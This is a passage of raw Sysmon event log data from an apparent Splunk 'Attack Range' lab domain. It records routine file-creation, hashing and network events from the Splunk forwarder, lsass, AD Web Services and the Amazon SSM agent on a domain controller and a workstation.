Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=97B5F57644A0E9E5EA52F485FE8DE3E9,SHA256=B7A123CE63FCB61A9B6F0A571A06191C8632859E51D7A53732EEEEF6C8AFC41Dfalsetrue 11241100x800000000000000057350846Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:20.896{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057350845Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:20.896{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3C228863883FBC7E1F3725DEC955A707,SHA256=1586644132B04D637F314DE64A97593E317354966030EC026580D9CAC514F60Cfalsetrue 23542300x800000000000000021219976Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:19:20.769{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3D97977FEF004955790BEC61CAC22E8D,SHA256=C3A302F39C86BB6FB89F43FF718F5B611CFB2F25E3E3AF979D78FE08FC0D2FFF,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000057350844Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:50.766{8B6011A9-886B-6164-0B00-00000000F101}648C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-469.attackrange.local54582-true0:0:0:0:0:0:0:1win-dc-469.attackrange.local389ldap 354300x800000000000000057350843Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:50.766{8B6011A9-887D-6164-2800-00000000F101}2864C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-469.attackrange.local54582-true0:0:0:0:0:0:0:1win-dc-469.attackrange.local389ldap 11241100x800000000000000057350851Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:21.911{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057350850Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:21.911{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2C0CF64152EAC26FA309BA8D19D61659,SHA256=830B72B3AC5D5012519645CD7B6DC1EDB558BDF5C88CD42E807914DECE63DAC4falsetrue 23542300x800000000000000021219977Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:19:21.800{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5609BF36431E936ADFB51D8D62C551F4,SHA256=AA748EE82ABA881C851766C8EF7A5907EA3510D4115D74A1C7BEAA272DF0A656,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000057350849Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:52.481{8B6011A9-BB96-618B-7AA0-04000000F101}7856C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-469.attackrange.local54583-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 11241100x800000000000000057350848Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:21.149{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security2021-09-16 14:18:46.122 23542300x800000000000000057350847Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:21.149{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=957EFEB5450C5C1AE878A4890C8D41F4,SHA256=70890FF273B80BF3B482564D30B28DBDAEDAB80BA88B0182902991121D464391falsetrue 23542300x800000000000000021219978Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:19:22.831{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4F902AF61A993BABB4DCD034C1C7F45E,SHA256=8945E357BB0DAF179CF458B8DC21C2311F70CB2A99E14C56743012891878BCAA,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 11241100x800000000000000057350853Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:22.947{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057350852Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:22.947{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B7B62DF9FF28DBB0A4EABE1CC01E0C8B,SHA256=DD0C41C8945846EF3BD6C3B31FF28D6969C42C613C879A1BE50B987E616FE047falsetrue 11241100x800000000000000057350857Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:23.977{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057350856Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:23.977{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A6BB8E059B5187B97B880A58925FFE8C,SHA256=1BC114AFA8EC2BBB3FE0D58359C24B859EBF2C65B914F7AAF63FD3E4B7D40BB7falsetrue 354300x800000000000000021219983Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:20:10.489{AD5E2759-54CF-6143-D400-00000000F101}3540C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-874.attackrange.local64349-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x800000000000000021219982Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:19:23.846{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AFCDB166A7B4C9BE884D0D32E545E084,SHA256=36810120F8B87ED39F6CD8D51914FA277D8F7E213B88C677684F9D1F1B3F9B05,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000021219981Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:19:23.398{AD5E2759-5433-6143-1A00-00000000F101}1972NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-09909a0b10b828df0\channels\health\respondent-20210916142702-79910MD5=8085950F126672766A1DF0580C539A31,SHA256=836015C54DD1F9176CE157D9E23B9B47C196C9CF50DD587B63CC20EE15FEF46E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000021219980Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:19:23.083{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=6C8A88BEB3EFF7EE0739CD35AD99EA90,SHA256=7BCE19C1D4F4E486FDF0D39339B17F0B05AE6A03B841B82813C4C30ED702D6FD,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000021219979Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:19:23.083{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=C181BEF0F414ACA611C80799C2ACF57B,SHA256=A711CD9224F1960777B01476B9E83416E7416EC6E871A069580A7E9205A9BB1F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 11241100x800000000000000057350855Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:23.662{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security2021-09-16 14:18:46.122 23542300x800000000000000057350854Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:23.662{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=4CAE0FD21BFFB15DB78979D18A1B1D8B,SHA256=918ABFEEE10E87FE58A35A0C8752FD518844750453FA38F1EFD652C07BEE111Ffalsetrue 23542300x800000000000000021219985Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:19:24.860{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9415B780DA9EA1370E60358E0C81D000,SHA256=024B37B80DDDF5DCD8F87D45F57C238CB32FB31A8A1991629B639C7404170E6A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000021219984Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:19:24.409{AD5E2759-5433-6143-1A00-00000000F101}1972NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-09909a0b10b828df0\channels\health\surveyor-20210916142700-79911MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000021219986Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:19:25.863{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EA93BA87F985DC711E28319F78454D48,SHA256=1FCCC2B805CF7E7D2F3E13158ED70370DC6682C55BCA48C133E0FF396BB34BA4,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 11241100x800000000000000057350859Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:25.008{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057350858Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:25.008{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7821FBF8F823E2740160704A4C30D884,SHA256=D3A578F7850A6023E4F07056D782BBB054F6785AB8A6C226EBC3213119275A2Bfalsetrue 23542300x800000000000000021219987Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:19:26.863{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5B519E3847DAB215EF2585B4DF87CD69,SHA256=313390EA3A16E0CC3363E6DE2A5CFA52BE35CAEFBBDF4A98E8627CD2FC5A8041,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000057350864Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:57.599{8B6011A9-BB96-618B-7AA0-04000000F101}7856C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-469.attackrange.local54584-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 11241100x800000000000000057350863Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:26.260{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security2021-09-16 14:18:46.122 23542300x800000000000000057350862Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:26.260{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=AE184B5E71A1814626C7413085A2A56B,SHA256=DAD53290125799A620CFB5384F500702B89FED54A0AD4EF32A3C83702713BC6Dfalsetrue 11241100x800000000000000057350861Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:26.029{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057350860Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:26.029{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F9E923F523F341B5D10E256AA357A30E,SHA256=FA9A910CD3EF7CCB96C42CA3EC4F9082B0256449E3F2DBD89E70D1B68BD1BA3Dfalsetrue 23542300x800000000000000021219988Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:19:27.874{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2548C48E7FF1384F097293840CF02800,SHA256=865F3A3552688E9052C08CD3F1E685C99D20FF6AAB52E654EBD450ED15182A6E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 11241100x800000000000000057350866Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:27.043{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057350865Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:27.043{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=043A041A39F1CF698AFDF9BF21745EB9,SHA256=3087F7E3FD20986D211BF7E4B0678B8B21C0657F235B8BCF4E5FC22AA23DD88Bfalsetrue 23542300x800000000000000021219989Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:19:28.874{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A3FF7ED2CB3741B4DBD5E5D8CF687D77,SHA256=F54DEDB788F566563E05939DA09D5BBC4F127EA423A3E21F791E559A3850E5ED,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 11241100x800000000000000057350870Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:28.658{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security2021-09-16 14:18:46.122 23542300x800000000000000057350869Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:28.658{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=AEAB1387D69072CC93F08AA907100739,SHA256=ABD77F1AB5E1F3AC2D668035AB842F029AE1E3E76B8B472681B1E98FDC02E70Cfalsetrue 11241100x800000000000000057350868Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:28.059{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057350867Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:28.059{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=35F0612467C576D37CC2A0D74AF71DF2,SHA256=48D4A0A25FA2E057D73356C8437F4F9876DA4CFC18A093BAE62E943FF27B7B78falsetrue 23542300x800000000000000021219992Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:19:29.890{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A9F3EE3E860350EE794DCDBECF8CABFA,SHA256=4D09E1AA176C8CC959BAB21C2161784939AD7DF7ADC4A194935B6BFF15D88359,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 11241100x800000000000000057350872Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:29.074{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057350871Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:29.074{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D67D42BC5C4B087127239F73C5AE352D,SHA256=C8564441C1B4BDD52ED124C5D0C050DBBBE1CE11A8A7468DE04457D82FFAB78Afalsetrue 23542300x800000000000000021219991Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:19:29.062{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D470B50C65368E2155BE3CB28E4FDC5E,SHA256=F3E4107D0DF8101857055471A5CE75B0359956FD61F976A1812C3995FF46439F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000021219990Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:19:29.062{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=6C8A88BEB3EFF7EE0739CD35AD99EA90,SHA256=7BCE19C1D4F4E486FDF0D39339B17F0B05AE6A03B841B82813C4C30ED702D6FD,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000021219994Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:19:30.890{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4184DFAA17196A0D11055B412A3E2ED7,SHA256=F64BD8AC91B8357EED3E9303D5CDD48EB150686DE6D282D36C34F2E1034D7BEA,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 11241100x800000000000000057350874Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:30.089{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057350873Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:30.089{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CD2022376BCF3A03D5F825751EE7618C,SHA256=45F997BA994FECEFC12732D1ACC13564697E79F0DD856ECBC7C7A2EAB6E58954falsetrue 354300x800000000000000021219993Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:20:16.485{AD5E2759-54CF-6143-D400-00000000F101}3540C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-874.attackrange.local64350-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x800000000000000021219995Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:19:31.890{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5B844B962FA41DD80D302CCB1876627C,SHA256=B085B65AFFED6153962A31CFBF185C4720A8383E9D9C3BB1F89C552D399235C1,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 11241100x800000000000000057350876Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:31.103{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057350875Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:31.103{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F8F5470202E3274F935DF3557BF1269E,SHA256=BB862A40824A381CE4CC815048D8793BA1740B01A0B1AFC1DF12ED4760C02024falsetrue 23542300x800000000000000021219996Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:19:32.890{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E2EE3FC106FCB888C8BD09749F8D5C14,SHA256=9EE2F47461CBD2D0D4CFE0E285E37DEF546E88089B164BD116D3A16677173AFD,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000057350881Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:20:03.496{8B6011A9-BB96-618B-7AA0-04000000F101}7856C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-469.attackrange.local54585-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 11241100x800000000000000057350880Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:32.155{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security2021-09-16 14:18:46.122 23542300x800000000000000057350879Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:32.155{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 